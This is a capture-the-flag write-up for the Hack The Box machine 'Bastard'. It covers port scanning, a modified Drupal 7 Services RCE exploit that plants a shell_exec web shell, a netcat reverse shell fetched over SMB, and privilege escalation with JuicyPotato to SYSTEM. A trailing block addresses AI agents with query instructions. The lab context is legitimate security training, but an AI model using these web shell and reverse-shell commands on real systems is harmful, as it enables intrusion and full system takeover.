# Bastard ![](/files/oNSvFnf0BAeXm1Cxw3CL) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.9 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Mon Mar 7 14:42:44 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.9 Nmap scan report for 10.10.10.9 Host is up (0.058s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 49154/tcp open unknown # Nmap done at Mon Mar 7 14:43:10 2022 -- 1 IP address (1 host up) scanned in 26.74 seconds ``` As we see, ports *80*, *135* and *49154* are open. Let's try to obtain more information about the services and versions running on those ports. > nmap -sC -sV -p80,135,49154 10.10.10.9 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Mon Mar 7 14:45:20 2022 as: nmap -sCV -p80,135,49154 -oN targeted 10.10.10.9 Nmap scan report for 10.10.10.9 Host is up (0.038s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt | http-methods: |_ Potentially risky methods: TRACE |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: Microsoft-IIS/7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 7 14:46:25 2022 -- 1 IP address (1 host up) scanned in 65.35 seconds ``` ## Exploitation On port *80* we have a *Drupal 7*. Let's look for any common exploit for that version of *Drupal*. > searchsploit Drupal 7.X ``` ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` Let's move the first exploit to our current folder. > searchsploit -m php/webapps/41564.php * `-m` **copies** an exploit to the current working directory. ``` Exploit: Drupal 7.x Module Services - Remote Code Execution URL: https://www.exploit-db.com/exploits/41564 Path: /usr/share/exploitdb/exploits/php/webapps/41564.php File Type: C++ source, ASCII text Copied to: /home/alfa8sa/HTB/machines/bastard/41564.php ``` Before executing it, we will have to change a few things. > nano 41564.php First, let's change the `$url` variable with the URL of the *Bastard* machine. ```php $url = 'http://10.10.10.9'; ``` Then we'll have to verify if the `$endpoint_path` exits. If we search for `http://10.10.10.9/rest_endpoint` we'll get an error saying that the requested page doesn't exist. ![](/files/mqHrZgTKxjZCmCdwjKWB) But don't worry, if you search for the `http://10.10.10.9/rest` directory we will get a message. ![](/files/go3Z8Yk4a5wo3lbrkGve) So on the *PHP* script we'll have to change the `$endpoint_path` variable to `/rest`. ```php $endpoint_path = '/rest'; ``` Finally, we'll have to modify the `$file` variable, by changing the *filename* and the *data* fields. At the *data* field we'll put some *PHP* code that will execute at a system level whatever we pass through the `cmd` parameter. ```php $file = [ 'filename' => 'rce.php', 'data' => '" . shell_exec($_REQUEST[\'cmd\']) . "";?>' ]; ``` Finally, we could run the script. > php 41564.php ``` # Exploit Title: Drupal 7.x Services Module Remote Code Execution # Vendor Homepage: https://www.drupal.org/project/services # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/drupal-services-module-rce #!/usr/bin/php Stored session information in session.json Stored user information in user.json Cache contains 7 entries File written: http://10.10.10.9/rce.php ``` Now we could access `http://10.10.10.9/rce.php` and execute commands with the `?cmd` parameter. > curl ``` 
nt authority\iusr
``` Time to get a shell. First, let's set a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Then you'll have to download [nc.exe](https://github.com/int0x33/nc.exe/) and set an *SMB* server with the *impacket-smbserver* tool in the directory where the binary is located. > impacket-smbserver smbFolder $(pwd) -smb2support Finally, if we access the previous *URL* indicating the *nc.exe* binary located in the shared folder, we could send us back a reverse as the `nt authority\iusr` user, and we could grab the user flag. > -e cmd 10.10.14.11 4444 ``` listening on [any] 4444 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49422 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>whoami whoami nt authority\iusr C:\inetpub\drupal-7.54>type \users\dimitris\desktop\user.txt type \users\dimitris\desktop\user.txt 9026b4905694e46ffc32a38fa2571407 ``` ## Privilege Escalation Let's see what privileges the user `nt authority\iusr` has. > whoami /priv ``` PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled ``` If a user has the *SeImpersonatePrivilege*, the first thing that comes to mind is *JuicyPotato*. {% hint style="info" %} **JuicyPotato** is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that *SeImpersonate* or *SeAssignPrimaryToken* are enabled. {% endhint %} To escalate privileges, we'll have to transfer `JuicyPotato.exe` to the victim machine. Let's set a python *HTTP* server on the directory where we have the *JuicyPotato* binary. > python -m SimpleHTTPServer And download the binaries from the desktop folder of the `nt authority\iusr` user. > certutil.exe -f -urlcache -split JuicyPotato.exe Before executing the `JuicyPotato.exe` binary, let's set another netcat listener on port *5555* to catch a reverse shell as the `NT AUTHORITY\SYSTEM` user. > nc -lvnp 5555 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. And let's set an SMB server on the directory where the `nc.exe` binary is located. > impacket-smbserver smbFolder $(pwd) -smb2support Finally, let's run the *JuicyPotato* binary to get a shell as the `NT AUTHORITY\SYSTEM` user. > JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555" * `-t` **createprocess** call. * `-l` COM server listen **port**. * `-p` **program** to launch. * `-a` specify command **arguments**. ``` Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 COM -> recv failed with error: 10038 ``` But we get an error. This is happening because *JuicyPotato* is using the default *CLSID*. If check for system information, we'll see the machine is a `Microsoft Windows Server 2008 R2 Datacenter`. > systeminfo ``` Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-402-3582622-84461 Original Install Date: 18/3/2017, 7:04:46 �� System Boot Time: 7/3/2022, 3:48:18 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.585 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.606 MB Virtual Memory: In Use: 489 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9 ``` So we have to change the *CLSID* to a valid one. You can check a Windows 8 *CLSID* list [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_8.1_Enterprise). {% hint style="info" %} The Class ID, or **CLSID**, is a serial number that represents a unique ID for any application component in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key HKEY\_CLASSES\_ROOT\CLSID{CLSID value}. {% endhint %} If we change it for `{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}`, we should get the reverse shell. Then all we have to do is reap the harvest and take the root flag. > JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555" -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" * `-t` **createprocess** call. * `-l` COM server listen **port**. * `-p` **program** to launch. * `-a` specify command **arguments**. * `-c` use **CLSID**. ``` listening on [any] 5555 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49455 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>type \users\administrator\desktop\root.txt type \users\administrator\desktop\root.txt 1d20b21916f1064ba7b0232d6725edeb ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/bastard.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.